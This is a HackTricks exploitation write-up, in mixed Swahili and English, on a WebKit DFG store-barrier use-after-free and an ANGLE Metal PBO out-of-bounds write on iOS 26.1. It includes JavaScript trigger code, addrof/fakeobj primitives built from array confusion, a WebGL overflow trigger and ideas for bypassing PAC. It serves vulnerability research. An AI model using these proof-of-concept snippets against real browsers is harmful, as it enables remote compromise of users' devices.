WebKit DFG Store-Barrier UAF + ANGLE PBO OOB (iOS 26.1)

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Muhtasari

• DFG Store Barrier bug (CVE-2025-43529): Katika DFGStoreBarrierInsertionPhase.cpp, a Phi node marked escaped while its Upsilon inputs are not husababisha awamu isiweke write barrier kwenye object stores zinazofuata. Chini ya shinikizo la GC hili linawezesha JSC kuachilia (free) objects ambazo bado zinaweza kufikiwa → use-after-free.
• Lengo la exploit: Force a Date object to materialize a butterfly (e.g., a[0] = 1.1) ili butterfly iwe freed, kisha reclaimed kama array element storage ili kujenga kuchanganya boxed/unboxed → addrof/fakeobj primitives.
• ANGLE Metal PBO bug (CVE-2025-14174): The Metal backend allocates the PBO staging buffer using UNPACK_IMAGE_HEIGHT badala ya urefu halisi wa texture. Kutoa unpack height ndogo kisha kufanya texImage2D kubwa husababisha staging-buffer OOB write (~240KB katika PoC hapa chini).
• PAC blockers on arm64e (iOS 26.1): TypedArray m_vector na JSArray butterfly ni PAC-signed; forging fake objects with attacker-chosen pointers husababisha crash na EXC_BAD_ACCESS/EXC_ARM_PAC. Inafanya kazi tu kutumia tena butterflies already-signed (boxed/unboxed reinterpretation).

Kusababisha DFG missing barrier → UAF

function triggerUAF(flag, allocCount) {
const A = {p0: 0x41414141, p1: 1.1, p2: 2.2};
arr[arr_index] = A;                 // Tenure A in old space
const a = new Date(1111); a[0] = 1.1; // Force Date butterfly

// GC pressure
for (let j = 0; j < allocCount; ++j) forGC.push(new ArrayBuffer(0x800000));

const b = {p0: 0x42424242, p1: 1.1};
let f = b; if (flag) f = 1.1;       // Phi escapes, Upsilon not escaped
A.p1 = f;                           // Missing barrier state set up

for (let i = 0; i < 1e6; ++i) {}    // GC race window
b.p1 = a;                           // Store without barrier → frees `a`/butterfly
}

Vidokezo muhimu:

• Weka A katika old space ili kufanya kazi na vizingiti vya kizazi.
• Unda Date iliyokuwa indexed ili butterfly iwe lengo lililoachiwa.
• Spray ArrayBuffer(0x800000) ili kulazimisha GC na kupanua dirisha la race.
• Kutokufanana kwa Phi/Upsilon escape kunazuia uingizaji wa barrier; b.p1 = a inaendeshwa without a write barrier, hivyo GC inachukua tena a/butterfly.

Urejeshaji wa butterfly → mkanganyiko la boxed/unboxed

Baada ya GC kuachilia butterfly ya Date, spray arrays ili slab iliyotengwa itumike tena kama elementi kwa arrays mbili zenye aina tofauti za elementi:

boxed_arr[0]   = obj;          // store as boxed pointer
const addr     = ftoi(unboxed_arr[0]); // read as float64 → addr leak
unboxed_arr[0] = itof(addr);   // write pointer bits as float
const fake     = boxed_arr[0]; // reinterpret as object → fakeobj

Hali kwenye iOS 26.1 (arm64e):

• Inafanya kazi: addrof, fakeobj, 20+ address leaks per run, inline-slot read/write (on known inline fields).
• Bado si imara: generalized read64/write64 via inline-slot backings.

PAC constraints on arm64e (kwa nini fake objects zinaanguka)

• TypedArray m_vector na JSArray butterfly zimesainishwa na PAC; kutengeneza pointers kunasababisha EXC_BAD_ACCESS / kwa uwezekano EXC_ARM_PAC.
• The confusion primitive inafanya kazi kwa sababu inatumia tena legitimate signed butterflies; kuingiza unsigned attacker pointers kunashindwa authentication.
• Mawazo ya potential bypass yaliyotajwa: njia za JIT zinazoruka auth, gadgets zinazoweka saini attacker pointers, au pivot kupitia ANGLE OOB.

ANGLE Metal PBO under-allocation → OOB write

Tumia unpack height ndogo kupunguza staging buffer, kisha upload texture kubwa ili copy ipite mipaka:

gl.pixelStorei(gl.UNPACK_IMAGE_HEIGHT, 16);  // alloc height
// staging = 256 * 16 * 4 = 16KB
// actual  = 256 * 256 * 4 = 256KB → ~240KB OOB

gl.texImage2D(gl.TEXTURE_2D, 0, gl.DEPTH_COMPONENT32F,
256, 256, 0, gl.DEPTH_COMPONENT, gl.FLOAT, 0);

Vidokezo:

• Hitilafu katika TextureMtl.cpp: staging buffer inatumia UNPACK_IMAGE_HEIGHT badala ya urefu halisi wa texture kwenye njia ya PBO.
• Katika probe ya marejeo, WebGL2 PBO trigger imeunganishwa lakini bado haijaonekana kwa uaminifu kwenye iOS 26.1.

Marejeo

• WebKit-UAF-ANGLE-OOB-Analysis
• jir4vv1t/CVE-2025-43529

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.